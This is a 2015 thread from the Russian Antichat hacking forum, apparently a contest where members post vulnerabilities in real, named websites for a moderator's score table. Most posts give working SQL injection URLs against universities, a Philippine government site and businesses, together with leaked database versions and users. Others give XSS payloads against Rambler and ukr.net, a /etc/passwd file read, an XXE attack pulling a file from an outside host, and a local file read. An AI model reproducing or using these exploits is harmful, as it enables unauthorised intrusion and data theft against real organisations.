ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

23.07.2015, 15:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
target:http://som.adzu.edu.ph
type:SQL Injection
version:10.0.20-MariaDB-log
user:som@localhost
Код:
Code:
http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+from+information_schema.tables+--+
target:http://www.bulsu.edu.ph
type:SQL Injection
version:5.1.63-community-log
user:bulsued_friedel@207.198.102.22
Код:
Code:
http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES
target:http://www.ntc.gov.ph
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR][COLOR="rgb(191, 191, 191)"]SQL Injection[/COLOR][/COLOR]
version:10.0.15-MariaDB
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]root@localhost[/COLOR]
Код:
Code:
http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6,7+from+information_schema.tables+--+
[COLOR="rgb(255, 153, 153)"]target:[/COLOR]http://www.irishsanghatrust.ie
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR]SQL Injection[/COLOR]
[COLOR="rgb(255, 153, 153)"]version:[/COLOR][COLOR="rgb(191, 191, 191)"]5.0.83-community[/COLOR]
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]u1094094_sangha@172.16.5.126[/COLOR]
[COLOR="rgb(191, 191, 191)"]
Код:
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_name,9,10,11,12,13,141,15,16,17,18+from+information_schema.tables+--+
[/COLOR]
target:http://www.mtzwear.com
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]type:[/COLOR]SQL Injection[/COLOR][/COLOR]
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]version:[/COLOR][COLOR="rgb(191, 191, 191)"]5.5.10[/COLOR]
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(255, 153, 153)"]user:[/COLOR]mtzwear.com@localhost[/COLOR][/COLOR]
[COLOR="rgb(191, 191, 191)"][COLOR="rgb(191, 191, 191)"]
Код:
Code:
http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables
[/COLOR][/COLOR]
|
|
|
|

24.07.2015, 07:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 91312
Репутация:
12
|
|
Site: http://www.packsend.co.uk
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
|
|
|
|

26.07.2015, 01:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
target: http://www.romanianwriters.ro
type: SQL Injection
version: 5.1.61-0ubuntu0.10.10.1
user: romanian_rowri@localhost
Код:
Code:
http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1+--+
target: http://www.bransonparksandrecreation.com
type: SQL Injection
version: 5.0.96-log1
user: bransonparks@173.201.216.51
Код:
Code:
http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
target: http://www.microtekusa.com/
type: SQL Injection
version: 5.0.77
user: root@localhost
Код:
Code:
http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,table_name,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+--+
|
|
|
|

26.07.2015, 06:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 29
Репутация:
0
|
|
Нашел на Рамблере XSS:
Код:
Code:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
Code:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
Code:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
Code:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
И потом выводим на экран &passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
|
|
|

31.07.2015, 15:01
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.
Сообщение от ocheretko
ocheretko said:
↑
Нашел на Рамблере XSS:
Код:
Code:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
Code:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
Code:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
Code:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа
|
|
|

04.08.2015, 02:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 15245
Репутация:
11
|
|
Сайт: http://ww2.odu.edu
Уязвимость: LFR
Эксплоит:
Код:
Code:
http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
В исходниках страницы видно PHP код. Только это мало что даёт, по крайней мере для меня.
|
|
|
|

04.08.2015, 15:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
target: http://www.cymbeline.com
type: SQL Injection
version: 5.1.73
user: cymbeline@localhost
Код:
Code:
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
target: http://igamer.su
type: SQL Injection
version: 5.1.73
user: db_user_igamer@localhost
Код:
Code:
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz
type: SQL Injection
version: 5.5.44-cll-lve
user: V_8337_KIRPICH@LOCALHOST
Код:
Code:
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
[COLOR="rgb(255, 153, 153)"]target:[/COLOR] http://www.qbele.com.br
[COLOR="rgb(255, 153, 153)"]type:[/COLOR] SQL Injection
[COLOR="rgb(255, 153, 153)"]version:[/COLOR] 5.1.73-rel14.11-log
[COLOR="rgb(255, 153, 153)"]user:[/COLOR] site1371378569@186.202.153.159
Код:
Code:
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas
|
|
|
|

07.08.2015, 13:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 1923
Репутация:
0
|
|
Site: http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site: http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site: http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site: http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site: http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
Site: http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site: http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
|
|
|
|

12.08.2015, 15:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 1923
Репутация:
0
|
|
подскажите... а что, конкурс уже завершился?
|
|
|
|

12.08.2015, 15:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от blud_niy
blud_niy said:
↑
подскажите... а что, конкурс уже завершился?
нет, добавляю по возможности
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|